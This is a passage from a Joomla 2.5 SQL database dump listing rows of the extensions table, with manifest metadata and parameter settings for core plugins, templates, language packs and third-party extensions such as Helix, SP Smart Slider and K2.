reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_SEARCH_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(421,'plg_search_weblinks','plugin','weblinks','search',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_search_weblinks\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_SEARCH_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(422,'plg_system_languagefilter','plugin','languagefilter','system',0,1,1,1,'{\"legacy\":false,\"name\":\"plg_system_languagefilter\",\"type\":\"plugin\",\"creationDate\":\"July 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_SYSTEM_LANGUAGEFILTER_XML_DESCRIPTION\",\"group\":\"\"}','{\"detect_browser\":\"0\",\"automatic_change\":\"1\",\"menu_associations\":\"0\",\"remove_default_prefix\":\"0\",\"lang_cookie\":\"1\",\"alternate_meta\":\"0\"}','','',0,'0000-00-00 00:00:00',1,0),(423,'plg_system_p3p','plugin','p3p','system',0,1,1,1,'{\"legacy\":false,\"name\":\"plg_system_p3p\",\"type\":\"plugin\",\"creationDate\":\"September 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_P3P_XML_DESCRIPTION\",\"group\":\"\"}','{\"headers\":\"NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM\"}','','',0,'0000-00-00 00:00:00',2,0),(424,'plg_system_cache','plugin','cache','system',0,0,1,1,'{\"legacy\":false,\"name\":\"plg_system_cache\",\"type\":\"plugin\",\"creationDate\":\"February 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_CACHE_XML_DESCRIPTION\",\"group\":\"\"}','{\"browsercache\":\"0\",\"cachetime\":\"15\"}','','',0,'0000-00-00 00:00:00',10,0),(425,'plg_system_debug','plugin','debug','system',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_system_debug\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_DEBUG_XML_DESCRIPTION\",\"group\":\"\"}','{\"profile\":\"1\",\"queries\":\"1\",\"memory\":\"1\",\"language_files\":\"1\",\"language_strings\":\"1\",\"strip-first\":\"1\",\"strip-prefix\":\"\",\"strip-suffix\":\"\"}','','',0,'0000-00-00 00:00:00',4,0),(426,'plg_system_log','plugin','log','system',0,1,1,1,'{\"legacy\":false,\"name\":\"plg_system_log\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_LOG_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',5,0),(427,'plg_system_redirect','plugin','redirect','system',0,1,1,1,'{\"legacy\":false,\"name\":\"plg_system_redirect\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_REDIRECT_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',6,0),(428,'plg_system_remember','plugin','remember','system',0,1,1,1,'{\"legacy\":false,\"name\":\"plg_system_remember\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_REMEMBER_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',7,0),(429,'plg_system_sef','plugin','sef','system',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_system_sef\",\"type\":\"plugin\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_SEF_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',8,0),(430,'plg_system_logout','plugin','logout','system',0,1,1,1,'{\"legacy\":false,\"name\":\"plg_system_logout\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_SYSTEM_LOGOUT_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',3,0),(431,'plg_user_contactcreator','plugin','contactcreator','user',0,0,1,1,'{\"legacy\":false,\"name\":\"plg_user_contactcreator\",\"type\":\"plugin\",\"creationDate\":\"August 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_CONTACTCREATOR_XML_DESCRIPTION\",\"group\":\"\"}','{\"autowebpage\":\"\",\"category\":\"34\",\"autopublish\":\"0\"}','','',0,'0000-00-00 00:00:00',1,0),(432,'plg_user_joomla','plugin','joomla','user',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_user_joomla\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2009 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_USER_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','{\"autoregister\":\"1\"}','','',0,'0000-00-00 00:00:00',2,0),(433,'plg_user_profile','plugin','profile','user',0,0,1,1,'{\"legacy\":false,\"name\":\"plg_user_profile\",\"type\":\"plugin\",\"creationDate\":\"January 2008\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_USER_PROFILE_XML_DESCRIPTION\",\"group\":\"\"}','{\"register-require_address1\":\"1\",\"register-require_address2\":\"1\",\"register-require_city\":\"1\",\"register-require_region\":\"1\",\"register-require_country\":\"1\",\"register-require_postal_code\":\"1\",\"register-require_phone\":\"1\",\"register-require_website\":\"1\",\"register-require_favoritebook\":\"1\",\"register-require_aboutme\":\"1\",\"register-require_tos\":\"1\",\"register-require_dob\":\"1\",\"profile-require_address1\":\"1\",\"profile-require_address2\":\"1\",\"profile-require_city\":\"1\",\"profile-require_region\":\"1\",\"profile-require_country\":\"1\",\"profile-require_postal_code\":\"1\",\"profile-require_phone\":\"1\",\"profile-require_website\":\"1\",\"profile-require_favoritebook\":\"1\",\"profile-require_aboutme\":\"1\",\"profile-require_tos\":\"1\",\"profile-require_dob\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(434,'plg_extension_joomla','plugin','joomla','extension',0,1,1,1,'{\"legacy\":false,\"name\":\"plg_extension_joomla\",\"type\":\"plugin\",\"creationDate\":\"May 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_EXTENSION_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(435,'plg_content_joomla','plugin','joomla','content',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_content_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_CONTENT_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(436,'plg_system_languagecode','plugin','languagecode','system',0,0,1,0,'{\"legacy\":false,\"name\":\"plg_system_languagecode\",\"type\":\"plugin\",\"creationDate\":\"November 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_SYSTEM_LANGUAGECODE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',10,0),(437,'plg_quickicon_joomlaupdate','plugin','joomlaupdate','quickicon',0,1,1,1,'{\"legacy\":false,\"name\":\"plg_quickicon_joomlaupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_QUICKICON_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(438,'plg_quickicon_extensionupdate','plugin','extensionupdate','quickicon',0,1,1,1,'{\"legacy\":false,\"name\":\"plg_quickicon_extensionupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_QUICKICON_EXTENSIONUPDATE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(439,'plg_captcha_recaptcha','plugin','recaptcha','captcha',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_captcha_recaptcha\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_CAPTCHA_RECAPTCHA_XML_DESCRIPTION\",\"group\":\"\"}','{\"public_key\":\"\",\"private_key\":\"\",\"theme\":\"clean\"}','','',0,'0000-00-00 00:00:00',0,0),(440,'plg_system_highlight','plugin','highlight','system',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_system_highlight\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2012 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_SYSTEM_HIGHLIGHT_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',7,0),(441,'plg_content_finder','plugin','finder','content',0,0,1,0,'{\"legacy\":false,\"name\":\"plg_content_finder\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2012 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_CONTENT_FINDER_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(442,'plg_finder_categories','plugin','categories','finder',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_finder_categories\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2012 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_FINDER_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(443,'plg_finder_contacts','plugin','contacts','finder',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_finder_contacts\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2012 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_FINDER_CONTACTS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(444,'plg_finder_content','plugin','content','finder',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_finder_content\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2012 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_FINDER_CONTENT_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',3,0),(445,'plg_finder_newsfeeds','plugin','newsfeeds','finder',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_finder_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2012 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_FINDER_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',4,0),(446,'plg_finder_weblinks','plugin','weblinks','finder',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_finder_weblinks\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2012 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_FINDER_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',5,0),(500,'atomic','template','atomic','',0,1,1,0,'{\"legacy\":false,\"name\":\"atomic\",\"type\":\"template\",\"creationDate\":\"10\\/10\\/09\",\"author\":\"Ron Severdia\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"contact@kontentdesign.com\",\"authorUrl\":\"http:\\/\\/www.kontentdesign.com\",\"version\":\"2.5.0\",\"description\":\"TPL_ATOMIC_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(502,'bluestork','template','bluestork','',1,1,1,0,'{\"legacy\":false,\"name\":\"bluestork\",\"type\":\"template\",\"creationDate\":\"07\\/02\\/09\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"TPL_BLUESTORK_XML_DESCRIPTION\",\"group\":\"\"}','{\"useRoundedCorners\":\"1\",\"showSiteName\":\"0\",\"textBig\":\"0\",\"highContrast\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(503,'beez_20','template','beez_20','',0,1,1,0,'{\"legacy\":false,\"name\":\"beez_20\",\"type\":\"template\",\"creationDate\":\"25 November 2009\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"2.5.0\",\"description\":\"TPL_BEEZ2_XML_DESCRIPTION\",\"group\":\"\"}','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"templatecolor\":\"nature\"}','','',0,'0000-00-00 00:00:00',0,0),(504,'hathor','template','hathor','',1,1,1,0,'{\"legacy\":false,\"name\":\"hathor\",\"type\":\"template\",\"creationDate\":\"May 2010\",\"author\":\"Andrea Tarr\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"hathor@tarrconsulting.com\",\"authorUrl\":\"http:\\/\\/www.tarrconsulting.com\",\"version\":\"2.5.0\",\"description\":\"TPL_HATHOR_XML_DESCRIPTION\",\"group\":\"\"}','{\"showSiteName\":\"0\",\"colourChoice\":\"0\",\"boldText\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(505,'beez5','template','beez5','',0,1,1,0,'{\"legacy\":false,\"name\":\"beez5\",\"type\":\"template\",\"creationDate\":\"21 May 2010\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"2.5.0\",\"description\":\"TPL_BEEZ5_XML_DESCRIPTION\",\"group\":\"\"}','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"html5\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(600,'English (United Kingdom)','language','en-GB','',0,1,1,1,'{\"legacy\":false,\"name\":\"English (United Kingdom)\",\"type\":\"language\",\"creationDate\":\"2008-03-15\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.10\",\"description\":\"en-GB site language\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(601,'English (United Kingdom)','language','en-GB','',1,1,1,1,'{\"legacy\":false,\"name\":\"English (United Kingdom)\",\"type\":\"language\",\"creationDate\":\"2008-03-15\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.10\",\"description\":\"en-GB administrator language\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(700,'files_joomla','file','joomla','',0,1,1,1,'{\"legacy\":false,\"name\":\"files_joomla\",\"type\":\"file\",\"creationDate\":\"August 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.14\",\"description\":\"FILES_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(800,'PKG_JOOMLA','package','pkg_joomla','',0,1,1,1,'{\"legacy\":false,\"name\":\"PKG_JOOMLA\",\"type\":\"package\",\"creationDate\":\"2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"http:\\/\\/www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PKG_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10000,'System - Helix Framework','plugin','helix','system',0,1,1,0,'{\"legacy\":false,\"name\":\"System - Helix Framework\",\"type\":\"plugin\",\"creationDate\":\"March 2011\",\"author\":\"JoomShaper.com\",\"copyright\":\"Copyright (C) 2010 - 2013 JoomShaper. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"2.1.1\",\"description\":\"Helix Framework - JoomShaper Template Framework for Joomla 2.5 and 3.X\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10002,'tytuvenu_piligrimu_centras','template','tytuvenu_piligrimu_centras','',0,1,1,0,'{\"legacy\":false,\"name\":\"tytuvenu_piligrimu_centras\",\"type\":\"template\",\"creationDate\":\"Oct 2013\",\"author\":\"JoomShaper.com\",\"copyright\":\"Copyright (C) 2010 - 2013 JoomShaper.com. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"http:\\/\\/www.joomshaper.com\",\"version\":\"1.0\",\"description\":\"\\n\\t\\t\\n\\t\\t\\tShaper Helix \\u2013 II is the default\\/blank template of Helix Framework version 2.<br \\/>\\n\\t\\t\\tThis template has all the in built functionality of Helix 2.0. Helix - II comes with tons of shortcode such for video, gallery, slideshow, tabs, accordion etc. \\n\\t\\t\\tHelix 2.0 especially comes with rich administration features such as logo settings, masterpiece layout builder,\\n\\t\\t\\tmega menu, unlimited fonts control, Google analytics,\\n\\t\\t\\tLess complitation and all types of presets control like header color, link color, background color so on.\\n\\t\\t\\tNow you don\\u2019t need to worry about its speed. The built-in css and javascript compresses \\n\\t\\t\\tused by Helix to provide optimal performance.\\n\\t\\t\\t<h3>Key Features<\\/h3>\\n\\t\\t\\t<ul class=\\\"arrow\\\">\\n\\t\\t\\t\\t<li>Unlimited module positions with the power of unique layout builder<\\/li>\\n\\t\\t\\t\\t<li>Powered by Bootstrap and compatible with Joomla 2.5 and 3.0<\\/li>\\n\\t\\t\\t\\t<li>Three (3) presets with presets manager<\\/li>\\n\\t\\t\\t\\t<li>Uses latest web technologies like html5 and css3<\\/li>\\n\\t\\t\\t\\t<li>Tons of shortcodes in built<\\/li>\\n\\t\\t\\t\\t<li>Built with LESS CSS<\\/li>\\n\\t\\t\\t\\t<li>Megamenu, RTL Support, CSS and JS compression and many more...<\\/li>\\n\\t\\t\\t<\\/ul>\\n\\t\\t\\n\\t\",\"group\":\"\"}','{\"layout_width\":\"1170\",\"layout_type\":\"responsive\",\"logo_type\":\"image\",\"logo_position\":\"logo\",\"logo_type_text\":\"Helix\",\"logo_type_slogan\":\"Joomla! Templates Framework\",\"logo_width\":\"130\",\"logo_height\":\"50\",\"footer_position\":\"footer1\",\"showcp\":\"1\",\"copyright\":\"Copyright \\u00a9  {year} Shaper Helix - II Demo. All Rights Reserved.\",\"show_helix_logo\":\"1\",\"jcredit\":\"1\",\"credit_link\":\"1\",\"credit_text\":\"Designed by {JoomShaper}\",\"validator\":\"0\",\"showtop\":\"1\",\"totop_position\":\"footer2\",\"preset\":\"preset1\",\"preset1_header\":\"#f8f8f8\",\"preset1_bg\":\"#f2f2f2\",\"preset1_text\":\"#666666\",\"preset1_link\":\"#22b8f0\",\"preset2_header\":\"#eeeeee\",\"preset2_bg\":\"#f5f5f5\",\"preset2_text\":\"#444444\",\"preset2_link\":\"#6d7f1b\",\"preset3_header\":\"#e5ddd5\",\"preset3_bg\":\"#f2f2f2\",\"preset3_text\":\"#333333\",\"preset3_link\":\"#aa824a\",\"menu\":\"mainmenu\",\"menutype\":\"mega\",\"menu_col_width\":\"200\",\"show_menu_image\":\"1\",\"menu_image_position\":\"1\",\"submenu_position\":\"0\",\"init_x\":\"0\",\"init_y\":\"0\",\"sub_x\":\"0\",\"sub_y\":\"0\",\"body_font\":\"\",\"header_font\":\"\",\"header_selectors\":\"\",\"other_font\":\"\",\"cache_time\":\"60\",\"compress_css\":\"0\",\"compress_js\":\"0\",\"enable_ga\":\"0\",\"ga_code\":\"\",\"loadjquery\":\"0\",\"loadfromcdn\":\"0\",\"lessoption\":\"1\",\"hide_component_area\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10003,'SP Smart Slider','module','mod_sp_smart_slider','',0,1,0,0,'{\"legacy\":false,\"name\":\"SP Smart Slider\",\"type\":\"module\",\"creationDate\":\"Nov 2012\",\"author\":\"JoomShaper.com\",\"copyright\":\"Copyright (C) 2010 - 2013 JoomShaper.com. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"1.0.9\",\"description\":\"SP Smart Slider\",\"group\":\"\"}','{\"sp_style\":\"nivo_slider\",\"module_cache\":\"1\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}','','',0,'0000-00-00 00:00:00',0,0),(10066,'definitions','plugin','definitions','josetta_ext',0,0,1,0,'false','{}','','',0,'0000-00-00 00:00:00',0,0),(10067,'fields_common','plugin','fields_common','josetta_ext',0,0,1,0,'false','{}','','',0,'0000-00-00 00:00:00',0,0),(10068,'definitions','plugin','definitions','josetta_ext',0,0,1,0,'false','{}','','',0,'0000-00-00 00:00:00',0,0),(10069,'fields_common','plugin','fields_common','josetta_ext',0,0,1,0,'false','{}','','',0,'0000-00-00 00:00:00',0,0),(10017,'My Forum Posts','plugin','mykunena','community',0,0,1,0,'{\"legacy\":true,\"name\":\"My Forum Posts\",\"type\":\"plugin\",\"creationDate\":\"2012-11-24\",\"author\":\"Kunena Team\",\"copyright\":\"(C) 2008 - 2012 Kunena Team. All rights reserved.\",\"authorEmail\":\"admin@kunena.org\",\"authorUrl\":\"http:\\/\\/www.kunena.org\",\"version\":\"2.0.3\",\"description\":\"PLG_COMMUNITY_MYKUNENA_DESCRIPTION\",\"group\":\"\"}','{\"count\":\"5\",\"coreapp\":\"0\",\"cache\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10048,'com_k2','component','com_k2','',1,1,0,0,'{\"legacy\":false,\"name\":\"COM_K2\",\"type\":\"component\",\"creationDate\":\"July 8th, 2013\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2013 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.6.7\",\"description\":\"Thank you for installing K2 by JoomlaWorks, the powerful content extension for Joomla!\",\"group\":\"\"}','{\"enable_css\":\"1\",\"jQueryHandling\":\"1.8.3\",\"backendJQueryHandling\":\"remote\",\"userName\":\"1\",\"userImage\":\"1\",\"userDescription\":\"1\",\"userURL\":\"1\",\"userEmail\":\"0\",\"userFeedLink\":\"1\",\"userFeedIcon\":\"1\",\"userItemCount\":\"10\",\"userItemTitle\":\"1\",\"userItemTitleLinked\":\"1\",\"userItemDateCreated\":\"1\",\"userItemImage\":\"1\",\"userItemIntroText\":\"1\",\"userItemCategory\":\"1\",\"userItemTags\":\"1\",\"userItemCommentsAnchor\":\"1\",\"userItemReadMore\":\"1\",\"userItemK2Plugins\":\"1\",\"tagItemCount\":\"10\",\"tagItemTitle\":\"1\",\"tagItemTitleLinked\":\"1\",\"tagItemDateCreated\":\"1\",\"tagItemImage\":\"1\",\"tagItemIntroText\":\"1\",\"tagItemCategory\":\"1\",\"tagItemReadMore\":\"1\",\"tagItemExtraFields\":\"0\",\"tagOrdering\":\"\",\"tagFeedLink\":\"1\",\"tagFeedIcon\":\"1\",\"genericItemCount\":\"10\",\"genericItemTitle\":\"1\",\"genericItemTitleLinked\":\"1\",\"genericItemDateCreated\":\"1\",\"genericItemImage\":\"1\",\"genericItemIntroText\":\"1\",\"genericItemCategory\":\"1\",\"genericItemReadMore\":\"1\",\"genericItemExtraFields\":\"0\",\"genericFeedLink\":\"1\",\"genericFeedIcon\":\"1\",\"feedLimit\":\"10\",\"feedItemImage\":\"1\",\"feedImgSize\":\"S\",\"feedItemIntroText\":\"1\",\"feedTextWordLimit\":\"\",\"feedItemFullText\":\"1\",\"feedItemTags\":\"0\",\"feedItemVideo\":\"0\",\"feedItemGallery\":\"0\",\"feedItemAttachments\":\"0\",\"feedBogusEmail\":\"\",\"introTextCleanup\":\"0\",\"introTextCleanupExcludeTags\":\"\",\"introTextCleanupTagAttr\":\"\",\"fullTextCleanup\":\"0\",\"fullTextCleanupExcludeTags\":\"\",\"fullTextCleanupTagAttr\":\"\",\"xssFiltering\":\"0\",\"linkPopupWidth\":\"900\",\"linkPopupHeight\":\"600\",\"imagesQuality\":\"100\",\"itemImageXS\":\"